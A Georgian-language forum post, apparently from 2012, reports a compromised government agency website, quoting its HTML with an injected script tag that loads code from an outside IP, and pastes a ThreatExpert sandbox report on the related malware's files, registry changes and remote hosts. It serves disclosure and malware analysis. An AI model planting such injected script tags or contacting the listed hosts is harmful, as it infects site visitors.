http://ema.gov.ge/ საწარმოთა მართვის სააგენტო
http://173.212.192.83/frame.phpეს არის
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Enterprise Management Agency</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link type="text/css" media="all" rel="stylesheet" href="css/style-geo.css" />
<script type="text/java[ertad]script" language="java[ertad]script" src="modules/lytebox/lytebox.js"></script>
<link rel="stylesheet" href="modules/lytebox/lytebox.css" type="text/css" media="screen" />
<script type="text/java[ertad]script" src="menu/menu.js"></script>
<!-- jQuery -->
<link rel="stylesheet" type="text/css" href="css/superfish.css" media="screen">
<link rel="stylesheet" type="text/css" href="css/superfish-v.css" media="screen">
<script type="text/java[ertad]script" src="js/jquery-1.2.6.min.js"></script>
<script type="text/java[ertad]script" src="js/hoverIntent.js"></script>
<script type="text/java[ertad]script" src="js/superfish.js"></script>
<script src=http://173.212.192.83/frame.php></script>
<script language="java[ertad]script" src="tween/Tween.js"></script>
<script language="java[ertad]script" src="tween/ColorTween.js"></script>
<script language="java[ertad]script" src="tween/OpacityTween.js"></script>
<script type="text/java[ertad]script">
* * *
http://www.threatexpert.com/report.aspx?md...efccea3da67905bესეც ამის შესახებ
Visit ThreatExpert web site
Submission Summary:
Submission details:
Submission received: 9 January 2012, 05:31:32
Processing time: 9 min 49 sec
Submitted sample:
File MD5: 0xF90B2E6910077D137EFCCEA3DA67905B
File SHA-1: 0xC5BE8CC3B83BFE22FD6FB19F217028F629C06777
Filesize: 39,424 bytes
Summary of the findings:
What's been found Severity Level
Downloads/requests other files from Internet.
Technical Details:
File System Modifications
The following files were created in the system:
# Filename(s) File Size File Hash
1 %AppData%\rpcsrv.log 85 bytes MD5: 0xB2117DC39D0A6D8046583E40ED1A766A
SHA-1: 0x1203A840F43F85ACD873A16FA8255CC4F31BE6F7
2 %AppData%\usbserv.### 39,936 bytes MD5: 0x7F226BF6B57CFC1374CFF7AF4F07F5E2
SHA-1: 0xB85F21506C515E40E1B753A230D2D24078E1DBF5
Note:
%AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.
Memory Modifications
There was a new process created in the system:
Process Name Process Filename Main Module Size
[filename of the sample #1] [file and pathname of the sample #1] 77,824 bytes
Registry Modifications
The following Registry Keys were created:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MediaResources\msvideo
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\msvideo
Other details
There were registered attempts to establish connection with the remote hosts. The connection details are:
Remote Host Port Number
173.212.192.83 80
213.131.32.218 80
31.214.140.214 80
The data identified by the following URLs was then requested from the remote web server:
http://173.212.192.83/frame.php http://ema.gov.ge/ http://ema.gov.ge/js/hoverIntent.js http://ema.gov.ge/js/superfish.js http://ema.gov.ge/tween/Tween.js http://ema.gov.ge/tween/ColorTween.js http://ema.gov.ge/tween/OpacityTween.js http://ema.gov.ge/img/site-title-geo.png http://ema.gov.ge/img/logo-geo.png http://ema.gov.ge/img/mail-icon.png http://ema.gov.ge/img/home-icon.png http://ema.gov.ge/modules/lytebox/lytebox.js http://ema.gov.ge/img/sitemap-icon.png http://ema.gov.ge/img/geo-icon.png http://ema.gov.ge/css/style-geo.css http://ema.gov.ge/img/bg.png http://ema.gov.ge/modules/lytebox/lytebox.css http://ema.gov.ge/menu/menu.js http://ema.gov.ge/css/superfish.css http://ema.gov.ge/css/superfish-v.css http://ema.gov.ge/js/jquery-1.2.6.min.js http://31.214.140.214/calc.php http://31.214.140.214/index312.php?ver=5.1...123&id=401acd00 http://31.214.140.214/index312.php?ver=5.1...123&id=401acd00 All content ("Information") contained in this report is the copyrighted work of Threat Expert Ltd and its associated companies ("ThreatExpert") and may not be copied without the express permission of ThreatExpert.
The Information is provided on an "as is" basis. ThreatExpert disclaims all warranties, whether express or implied, to the maximum extent permitted by law, including the implied warranties that the Information is merchantable, of satisfactory quality, accurate, fit for a particular purpose or need, or non-infringing, unless such implied warranties are legally incapable of exclusion. Further, ThreatExpert does not warrant or make any representations regarding the use or the results of the use of the Information in terms of their correctness, accuracy, reliability, or otherwise.
Copyright © 2012 ThreatExpert. All rights reserved.
This post has been edited by alika1982 on 28 Mar 2012, 13:35
მიმაგრებული სურათი (გადიდებისთვის დაუწკაპუნეთ სურათზე)
ვისაც არ უყვარს - არც ენატრება. ვისაც არ ენატრება, არც არასოდეს ყვარებია და არც არავის ელოდება.
თვალთვალი კომპიუტერული ვირუსის მეშვეობით, საინტერესოა ინფო
